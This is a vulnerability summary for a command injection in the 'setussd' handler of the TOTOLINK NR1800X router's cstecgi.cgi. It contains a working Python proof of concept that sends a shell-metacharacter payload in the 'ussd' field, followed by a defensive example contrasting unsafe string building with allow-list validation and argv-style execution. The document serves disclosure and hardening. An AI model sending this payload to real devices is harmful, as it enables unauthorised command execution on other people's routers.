# TOTOLINK NR1800X command injection summary

## Overview

In the `setussd` handling path of `cstecgi.cgi`, the `ussd` parameter is concatenated directly into a command string that is passed to `system()`. Shell metacharacters in the parameter are therefore interpreted by the shell, which gives an authenticated request arbitrary command execution on the device (command injection).

## Affected scope

* **Vendor**: TOTOLINK
* **Affected product**: CB34FR-1C (NR1800X)
* **Affected firmware version**: V9.1.0u.6279_B20210910 (observed in a local lab)

## Remediation

* The page provides no specific fix or patch link.
* Recommendation to the vendor: strictly validate the `ussd` parameter in `cstecgi.cgi` against the expected USSD format (or at minimum escape it) instead of concatenating it into a system command, and prefer passing it as a separate argument to an `exec`-style call so no shell parses it.

## POC code

```python
#!/usr/bin/env python3
# Proof of concept for the setussd command injection in cstecgi.cgi.
# Flow: obtain a SESSION_ID from the login endpoint, then POST a JSON body
# whose "ussd" value carries shell metacharacters. On a vulnerable device the
# injected echo writes a marker file to /tmp/ussd_success.
import json
import re
import socket

TARGET = "192.168.211.128"   # lab device address
PORT = 80
LOGIN_PATH = "/formLoginAuth.htm?authCode=&action=login"
CGI_PATH = "/cgi-bin/cstecgi.cgi"


def send_raw(req: bytes) -> bytes:
    """Send a raw HTTP request and read the response until close or timeout."""
    with socket.create_connection((TARGET, PORT), timeout=3) as s:
        s.sendall(req)
        s.settimeout(3)
        chunks = []
        while True:
            try:
                chunk = s.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
            except socket.timeout:
                break
    return b"".join(chunks)


def get_session_id() -> str:
    """Fetch the login endpoint and extract the SESSION_ID value from the reply."""
    req = (
        f"GET {LOGIN_PATH} HTTP/1.1\r\n"
        f"Host: {TARGET}\r\n"
        f"Connection: close\r\n\r\n"
    ).encode()
    data = send_raw(req).decode(errors="ignore")
    m = re.search(r"SESSION_ID=([^\r\n]*)", data)
    return m.group(1) if m else ""


def verify_set_ussd(session_id: str) -> str:
    """Send the setussd request with an injected command; return the status line."""
    # '#' terminates the USSD-looking prefix, ';' ends the original command,
    # and the echo runs as a separate shell command.
    cmd_payload = "# ; echo 'Congratulations on executing the command' > /tmp/ussd_success;"
    body = json.dumps({"topicurl": "setussd", "ussd": cmd_payload}, separators=(",", ":"))
    req = (
        f"POST {CGI_PATH} HTTP/1.1\r\n"
        f"Host: {TARGET}\r\n"
        f"Content-Type: application/json\r\n"
        f"Content-Length: {len(body.encode())}\r\n"
        f"Cookie: SESSION_ID={session_id}\r\n"
        f"Connection: close\r\n\r\n"
        f"{body}"
    ).encode()
    data = send_raw(req).decode(errors="ignore")
    return data.split("\r\n", 1)[0] if data else "NO_RESPONSE"


if __name__ == "__main__":
    sid = get_session_id()
    if not sid:
        print("[FAILED] no SESSION_ID")
    else:
        print(verify_set_ussd(sid))
```
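The following is an added example, not code from the page or from TOTOLINK's firmware. It models the vulnerable pattern (the `ussd` value concatenated into a `system()` string) next to a hardened version, and uses a small shell tokenizer to show how many commands `/bin/sh` would actually run in each case. The backend command name `ussd_send`, the exact format string, and the USSD grammar (`*` or `#`, digits/`*`/`#`, trailing `#`, as in `*100#`) are assumptions; the real firmware's command format is not known from the page, and the tokenizer only handles `;` separation, not the full sh grammar.

```python
import re
import shlex

# Assumed USSD grammar: starts with '*' or '#', then digits/'*'/'#', ends with '#'.
# Real deployments should take the exact alphabet from the modem/carrier spec.
USSD_RE = re.compile(r"^[*#][0-9*#]{0,30}#$")

# The payload from the page's POC (constructed here for comparison).
INJECTION_PAYLOAD = "# ; echo 'Congratulations on executing the command' > /tmp/ussd_success;"


def build_command_unsafe(ussd: str) -> str:
    """Vulnerable pattern: the parameter is pasted into a shell command string.
    'ussd_send' is a hypothetical backend binary (assumption)."""
    return f"ussd_send {ussd}"


def is_valid_ussd(ussd: str) -> bool:
    """Allow-list check: only strings matching the assumed USSD grammar pass."""
    return USSD_RE.fullmatch(ussd) is not None


def validate_ussd(ussd: str) -> str:
    if not is_valid_ussd(ussd):
        raise ValueError(f"rejected USSD string: {ussd!r}")
    return ussd


def build_command_safe(ussd: str) -> str:
    """Hardened string form: validate first, then quote so the shell sees one word.
    Quoting alone is defence in depth; the allow-list is the real fix."""
    return f"ussd_send {shlex.quote(validate_ussd(ussd))}"


def build_argv_safe(ussd: str) -> list[str]:
    """Hardened argv form: validate, then hand the value to an exec-style call
    (e.g. subprocess.run(argv) without shell=True) so no shell ever parses it."""
    return ["ussd_send", validate_ussd(ussd)]


def shell_commands(cmd: str) -> list[list[str]]:
    """Approximate how /bin/sh splits a command line into separate commands.
    Uses shlex with punctuation_chars so ';' and '>' become their own tokens,
    and treats each ';' as a command separator (a simplification of sh)."""
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    lex.commenters = ""  # '#' is data here, not a comment marker
    cmds: list[list[str]] = []
    cur: list[str] = []
    for tok in lex:
        if tok == ";":
            if cur:
                cmds.append(cur)
            cur = []
        else:
            cur.append(tok)
    if cur:
        cmds.append(cur)
    return cmds


if __name__ == "__main__":
    print("unsafe:", shell_commands(build_command_unsafe(INJECTION_PAYLOAD)))
    print("safe:  ", shell_commands(build_command_safe("*100#")))
    print("argv:  ", build_argv_safe("*#06#"))
    try:
        build_command_safe(INJECTION_PAYLOAD)
    except ValueError as e:
        print("blocked:", e)
```

Running it shows the unsafe build turning the single `ussd_send` invocation into two commands, the second being the attacker's `echo ... > /tmp/ussd_success`, while the hardened forms either reject the payload outright or pass a legitimate code such as `*100#` through as exactly one argument.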